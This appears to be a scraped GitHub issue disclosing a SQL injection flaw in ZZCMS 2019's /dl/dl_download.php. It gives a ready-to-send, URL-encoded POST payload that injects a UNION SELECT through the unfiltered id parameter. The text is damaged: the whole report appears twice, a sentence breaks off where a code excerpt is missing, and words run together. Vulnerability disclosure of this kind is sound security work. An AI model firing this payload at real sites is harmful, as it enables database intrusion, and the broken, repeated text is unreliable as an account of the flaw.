0x01 Vulnerability (/dl/dl_download.php line 67 ~ 71)
If index of ',' value in id parameter is bigger than 0 sql will be
When we check the query there is no single quote to id parameter. So We can inject
any query with id parameter
We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter
0x02 payload
give below "POC" value for post data in "/dl/dl_download.php"
POC : union SQL injection
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page_size%3D2&FileExt=xls&sql=select+count%28*%29+as+total+from+zzcms_dl+where+classid%3D1+&chkAll=checkbox&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,
The text was updated successfully, but these errors were encountered:
Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS2018升2019 (2019-01-11)
0x01 Vulnerability (/dl/dl_download.php line 67 ~ 71)
If index of ',' value in
idparameter is bigger than 0 sql will beWhen we check the query there is no single quote to
idparameter. So We can injectany query with
idparameterWe can find there is no security filter for
idparameter and it means we can inject Sql query viaidparameter if we concat ',' value at the end ofidparameter0x02 payload
give below "POC" value for post data in "/dl/dl_download.php"
POC : union SQL injection
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page_size%3D2&FileExt=xls&sql=select+count%28*%29+as+total+from+zzcms_dl+where+classid%3D1+&chkAll=checkbox&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,
The text was updated successfully, but these errors were encountered: